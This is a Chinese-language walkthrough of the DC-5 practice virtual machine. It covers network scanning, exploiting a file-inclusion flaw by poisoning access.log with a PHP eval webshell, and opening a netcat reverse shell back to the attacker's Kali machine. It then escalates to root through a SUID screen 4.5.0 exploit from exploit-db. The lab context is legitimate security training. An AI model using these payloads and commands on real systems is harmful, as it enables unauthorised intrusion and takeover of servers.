DC-5

1.取得靶机，将靶机复制在自己电脑上，打开靶机

选择编辑此虚拟机，点击网络配适器，选择NAT模式然后确定

开启此虚拟机

到这步后我们开启kali虚拟机，同样选择编辑此虚拟机，点击网络配适器，选择NAT模式然后确定

打开kali虚拟机，其密码为kali

我们先获取root权限，输入su root，password为123456（Linux内输入password是看不见的）

先用ifconfig查看kali的ip地址为192.168.126.129

我们用nmap扫描收集信息，输入nmap -sP 192.168.126.0/24 -oN nmap.sV

得到靶机ip：192.168.126.132，对其进行端口扫描

可以看到开放了80端口和111端口，111端口是RPC服务，感觉没有什么可以利用的点，我们去浏览器访问80端口试试（可以打开kali自带的火狐浏览器，使用kali自带浏览器前需要打开burpsuit，也可以用自己电脑的浏览器）

输入刚刚获得的靶机ip，例如我的就是

发现这是一个动态页面，可以尝试去提交一些东西。

我们点击右上角Contact，往下滑发现可以输入

提交后可以发现，本人电脑的Microsoft Edge因为改成了翻译系统，一般情况会显示DC-5 is alive

扫描web目录，输入dirb

很可惜此处没有太多有价值的东西，继续浏览可以发现contact可以发现年份会随着页面刷新而刷新

之前在thinkyou.php中看到了这种情况（网页刷新一次，年份都会发生变化），因此我们猜测thinkyou.php调用了footer.php，于是想到了文件包含漏洞，输入footer.php试试

看见页面变化，我们回到kali，用kali自带的burpsuite进行抓包

关于burpsuite的详细配置教程我放在另外一个文档里面，没有配置的小伙伴可以先配置一下

打开burpsuite后，返回浏览器界面

在开着intercept on的同时刷新浏览器页面（回到浏览器按下f5）burp会自动抓包

点击Action，选择send to Repeater发送到Repeater

利用access.log。抓包在burpsuite-repeater中，把url修改为一句话木马 Get <?php phpinfo();?> ，回显400 bad request

返回浏览器查看，哭看见页面发生变化

滑到最底下是这样的，可以看见显示了php信息，意识到可以通过这个方式写入木马

我们返回burpsuite，写入一句话木马 GET <?php @eval($_POST['1234'];?> .

（注意，这里的POST['']里面的内容是可以更改的，也就是之后用蚁剑连接的密码

接着我们使用蚁剑连接，此处我的蚁剑是windows版本的，所以密码就是POST内的内容1234

点击添加数据

点击测试连接，可以看见连接成功

我们回到kali，输入nc -lvvp 1234开启这个端口的监听

然后在蚁剑中，点击右键，选择虚拟终端，输入nc -e /bin/bash 192.168.126.129 1234进行shell反弹

可以在kali中看见成功

返回kali交互式 输入python -c 'import pty;pty.spawn("/bin/bash")'

使用find / -perm -4000 2>/dev/null查找具有SUID权限的文件，发现screen-4.5.0。

使用searchsploit查找该命令漏洞：searchsploit screen 4.5.0 -w

两个文件是相同的，41152.txt是告诉你怎么做，之前的靶机也出现过，显然41154.sh已经把文件给了，所以选择下载41154.sh

发现有两个漏洞

先查看第一个

将第一个复制到桌面

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

查看该文件

发现其在 /tmp 路径下编译了两个 c，并执行了若干命令

按照脚本提示，先将第一部分内容写到libhax.c中(一共有三个部分)

第一步在桌面创建一个文件夹存放三个部分的脚本

使用命令vim创建第一个libhax.c

然后编译这个脚本

gcc -fPIC -shared -ldl -o libhax.so libhax.c

、

使用vim命令创建第二个rootshell.c，复制粘贴完内容后按下esc输入：wq保存退出

再编译

gcc -o rootshell rootshell.c

最后一个部分dc5.sh同理，但是需要注意的是下面需要转换一下格式

执行完命令后，可以看见在桌面home/dc-5文件夹有五个文件

将带有.c的文件删除，在kali中使用rm命令

再回到文件夹内可以看见

然后我们回到中国蚁剑，将文件上传到tmp文件里面，需要注意的是我们一定要讲文件传到根目录下，而不是var，/var是源码

然后重命名，将路径去掉

回到kali反弹的shell（步骤和之前一样），进入到天麻片、目录里面

然后为dc5.sh添加可以执行权限，输入chmod +x dc5.sh

验证权限，切换到/root根目录下找到flag，渗透成功